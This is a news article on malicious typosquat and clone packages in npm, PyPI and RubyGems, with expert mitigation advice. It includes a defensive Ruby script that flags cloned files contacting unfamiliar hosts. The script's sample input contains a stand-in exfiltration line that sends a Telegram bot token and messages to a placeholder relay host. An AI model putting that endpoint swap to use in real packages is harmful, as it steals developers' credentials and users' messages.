Multiple malicious packages were discovered across leading open-source code repos such as npm, PyPI and RubyGems, causing supply chain incidents. While these repos speed development, the findings highlight how such packages expose dev teams to security risks.
The issues around open-source repos were brought up in reports by leading research groups over the past several weeks, including Checkmarx, ReversingLabs, and Socket, according to The Hacker News.
In one of the more prolific cases recently discovered, two open-source code repositories on RubyGems were created as near-perfect clones of legitimate code repositories. A single line swap could reroute every Telegram API call through a Cloudflare Worker under the attacker’s control, siphoning bot tokens, chat IDs, messages and file uploads.
Jason Soroko, senior fellow at Sectigo, explained that the operator — using Vietnamese-language aliases — pushed the RubyGems code just days after Vietnam banned Telegram, but the code had no geofence, so any Fastlane pipeline that pulled the plugin was compromised.
“Open-source registries such as npm, PyPI, and RubyGems have the potential to become malware distribution channels,” said Soroko. “Attackers weaponize typosquats and copy forks because dependency sprawl, auto-updates, and opaque transitive pulls let a single rogue publish slip past reviews and land in production builds. Supply chain incidents now rival traditional exploits in frequency. Developers use these open-source repositories constantly and almost without thinking.”
Nic Adams, co-founder and CEO at 0rcus, added that security pros remain tethered to npm, PyPI, and RubyGems because they offer speed and access to critical dependencies. The advantages to developers are vast open-source libraries, seamless integration into CI/CD pipelines, broad community support, frequent updates, and rapid innovation lifecycles.
“The alternative is closed or internal repos, which lack flexibility via slow delivery,” said Adams. “Despite known supply chain risks, pure velocity and overall convenience of aforementioned platforms keep them deeply intertwined in modern development and operations. Attackers exploit weak or automated publishing controls, repurpose trusted package names with subtle misspellings, weaponize nested dependencies to bypass audits, and leverage social engineering to gain repo access.”
What can dev teams do?
Mitigation requires a layered defense, Adams added: teams need to implement automated static and dynamic analysis on all dependencies, enforce strict version pinning, employ dependency provenance and signature verification, isolate build environments, and maintain real-time threat intelligence feeds that monitor for suspicious package behaviors.
They also need to integrate package risk-scoring tools and automate alerts for newly reported malicious or typosquatting packages.
“Balancing speed with security means embedding these checks directly into CI/CD workflows, shifting left without introducing friction or manual gatekeeping bottlenecks,” said Adams.
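As an added illustration (not code from any of the researchers or vendors quoted here), the static check below compares a candidate package against a trusted copy of the package it imitates and reports every changed or added line that contacts a host the trusted copy never uses, which is the kind of one-line endpoint swap described in the RubyGems case. The file name, the source lines and the host relay.example.invalid are constructed sample data, and audit_clone and url_hosts are hypothetical helper names.

```ruby
require "set"

HOST_RE = %r{https?://([A-Za-z0-9.-]+)}i

# Set of lower-cased hosts named by http(s) URLs in a piece of source text.
def url_hosts(text)
  text.scan(HOST_RE).flatten.map(&:downcase).to_set
end

# trusted / candidate: Hash of relative path => file contents.
# Returns one finding per changed or added line that names a host the
# trusted copy never contacts.
def audit_clone(trusted, candidate)
  known_hosts = trusted.values.reduce(Set.new) { |acc, src| acc | url_hosts(src) }
  findings = []
  candidate.each do |path, src|
    baseline = (trusted[path] || "").lines.map(&:strip).to_set
    src.lines.each_with_index do |line, idx|
      next if baseline.include?(line.strip) # identical line exists upstream
      (url_hosts(line) - known_hosts).each do |host|
        findings << { file: path, line: idx + 1, host: host }
      end
    end
  end
  findings
end

# Constructed sample input: a legitimate plugin file and a clone of it that
# differs only in the API endpoint (placeholder host, not a real indicator).
TRUSTED = {
  "lib/telegram_action.rb" => <<~'RUBY'
    require "net/http"
    uri = URI.parse("https://api.telegram.org/bot#{token}/sendMessage")
    Net::HTTP.post_form(uri, chat_id: chat_id, text: text)
  RUBY
}
CANDIDATE = {
  "lib/telegram_action.rb" => <<~'RUBY'
    require "net/http"
    uri = URI.parse("https://relay.example.invalid/bot#{token}/sendMessage")
    Net::HTTP.post_form(uri, chat_id: chat_id, text: text)
  RUBY
}

if __FILE__ == $PROGRAM_NAME
  audit_clone(TRUSTED, CANDIDATE).each do |f|
    puts "#{f[:file]}:#{f[:line]} contacts unexpected host #{f[:host]}"
  end
end
```

Findings are leads for review rather than verdicts: a legitimate release can add a new endpoint, so the trusted copy should be the exact upstream version the candidate claims to match.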
Darren Meyer, security research advocate at Checkmarx, added that developers need to select packages and move quickly to maintain productivity and delivery velocity within their organizations, while AppSec teams want to make sure this gets done in a way that protects the organization's data and infrastructure.
“Implementing tools that have an API that allows for automated identification of malicious packages before they are downloaded and used is essential to hitting that balance,” said Meyer. “If an organization uses a package management repository — which they really should — then they can gain a lot of safety by enforcing its use and plugging a malicious package protection API to ensure that repository stays clean.”